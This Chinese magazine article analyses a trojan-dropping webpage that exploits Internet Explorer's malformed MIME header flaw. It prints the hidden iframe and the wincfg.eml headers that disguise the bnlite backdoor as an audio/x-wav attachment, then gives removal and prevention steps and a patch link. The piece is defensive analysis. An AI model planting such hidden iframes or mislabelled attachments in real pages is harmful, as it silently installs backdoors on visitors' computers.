編者按:上期我們介紹的是“萬花谷”病毒攻防戰,其實互聯網上類似的網站還很多(計算機愛好者,學習計算機基礎,電腦入門,請到本站http://.,我站同時提供計算機基礎知識教程,計算機基礎知識試題供大家學習和使用),,只要有帶新的病毒的網站出現,我們就有義務告知大家。如果大家有網絡安全方面的稿件,請發xiongjie@cpcw.Com信箱,我們將以最快速度把實用性強的文章刊登出來。
一、切身體驗
在進入木馬網頁的過程中,鼠標奇怪地變成沙漏形狀,看來的確是有程序在運行。打開計算機的任務管理器,可以看到多了一個wincfg.Exe的進程。進程對應的文件在Win2000下是c\winnt\wincfg.Exe,在Win98下是c\windows\wincfg.Exe。
運行注冊表編輯器regedit,在“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVerion\Run”下發現wincfg.Exe,原來它將自己登記在注冊表開機啟動項中,這樣每次開機都會自動運行wincfg.Exe。(如圖)
注:給你下套的人可以自己設定這個木馬的啟動鍵名和注冊文件名,注冊文件名也就是運行時進程裡的名稱,因此大家看到的結果可能不相同。
運行金山毒霸,報告發現“backdoor bnlite”,哦,原來是木馬bnlite服務端改名為wincfg.Exe。別看這個木馬服務端程序不大(僅有6.5K),但它的功能可不少:具有ICQ通報功能、遠程刪除服務端功能、設定端口和運行名稱、上傳下載……如果你中了該木馬,那麼木馬控制端完全可以通過這個木馬在你的電腦上建立一個隱藏的FTP服務器,別人就有最大權限進入你的電腦了!這樣控制你的電腦將非常容易!
木馬是如何下載到浏覽了該主頁的計算機中、並運行起來的呢?在IE中點擊“工具”→“Internet選項”→“安全”→“自定義安全級別”,將ActiveX相關選項全部都禁用,再浏覽該網頁,wincfg.Exe還是下載並運行了!看來這和ActiveX無關。在“自定義安全級別”中有關文件下載的選項都禁止,再浏覽該網頁,這回wincfg.Exe不再下載了。
二、問題揭示
我們來看看wincfg.Exe是如何下載到浏覽者計算機上的,在該網頁上點擊鼠標右鍵,選擇其中的“查看源代碼”,在網頁代碼最後面發現了可疑的語句:
<iframe src=wincfg.Eml width=1 height=1>
注意到其中的“wincfg.Eml”了嗎?大家都知道eml為郵件格式,網頁中要eml文件干什麼呢?非常可疑!在IE浏覽器中輸入:http//shirf.51.Net/wincfg.Eml,再看看任務管理器,wincfg.Exe進程又回來了,原來問題就在這個文件上!既然問題在這文件上,當然得想辦法得到這個文件看看了。用螞蟻把文件下載下來,鼠標剛點上去,wincfg.Exe又被執行了,真是陰魂不散啊!
打開wincfg.Eml,發現其關鍵內容如下:
Content-Type audio/x-wav name=“wincfg.Exe” ★這一句定義了文件名稱,在此為wincfg.Exe
Content-Transfer-Encoding base64 ★定義了代碼格式為base64
Content-ID <THE-CID> ★從這裡開始才是代碼的起步
TVqQAAMAAAAEAAAA//8AAL……以下刪掉一大節 ★這些是wincfg.Exe經過base64編碼的內容
上面加了“★”的部分為注釋內容。這個以base64方式編碼的文件,會在你浏覽網頁時編譯成wincfg.Exe文件並運行,這就是浏覽該網頁會中木馬的原因!至此我就明白了,其實,所謂的浏覽網頁會中木馬,只是網頁制作者利用了微軟IE浏覽器中存在的漏洞進行攻擊的一個案例而已,說白了就是利用了錯誤的MIMEMultipurpose Internet Mail Extentions,多用途的網際郵件擴充協議頭進行攻擊。
三、真相大白
現在,再回過頭來看看我所中的木馬是怎麼回事。其實,wincfg.Exe這個文件在這裡相當於郵件的附件,從我們所列的代碼中可以看到,攻擊者把wincfg.Exe的類型定義為audio/x-wav,由於郵件的類型為audio/x-wav時,IE存在的這個錯誤的MIME頭漏洞會將附件認為是音頻文件,並自動嘗試打開,結果導致郵件文件wincfg.Eml中的附件wincfg.Exe(木馬)被執行。在Win2000下,即使是用鼠標點擊下載下來的wincfg.Eml,或是拷貝粘貼該文件,都會導致wincfg.Eml中的附件被運行,微軟的這個漏洞可真是害人不淺啊。現在看來,原先那些攻擊者想方設法欺騙被攻擊目標執行修改過的木馬等後門程序,是多麼落後的手段啊!如今,利用微軟“創造”的這個大漏洞來進行攻擊,是多麼簡單、多麼容易啊!唯一的條件就是被攻擊目標使用IE5.0及以上版本中的一種,使用IE浏覽器的用戶到底有多少呢?看看你身邊的朋友就知道答案了!
四、解決辦法
1點擊“開始”→“運行”,在彈出的對話框中輸入“regedit”,回車。然後展開注冊表到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下刪除wincfg.Exe;
2到你的計算機的系統目錄下,刪除其中的wincfg.Exe文件;
3重新啟動機器,就一切OK了!
五、預防方法
1.IE和Outlook的用戶。
1在IE的“工具→Internet選項→安全→Internet區域的安全級別”,把安全極別由“中”改為“高”。
2點擊“自定義級別”按鈕,在彈出的窗口中,禁用“對標記為可安全執行腳本的ActiveX控件執行腳本”、“活動腳本”和“文件下載”功能。
3禁用所有的ActiveX控制和插件。
4將資源管理器設置成“始終顯示擴展名”。
5禁止以WEB方式使用資源管理器。
6取消“下載後確認打開”這種擴展名屬性設置。
2.不要受陌生人的誘惑打開別人給你的URL,如果確實想看,可以通過一些下載工具把頁面下載下來,然後用記事本等一些文本編輯工具打開查看代碼。
3.微軟公司為該漏洞提供了一個補丁,趕快到下面所列出的URL去看看吧:
http://www.Microsoft.Com/windows/IE/download/critical/Q290108/default.Asp
惡意代碼與網絡安全.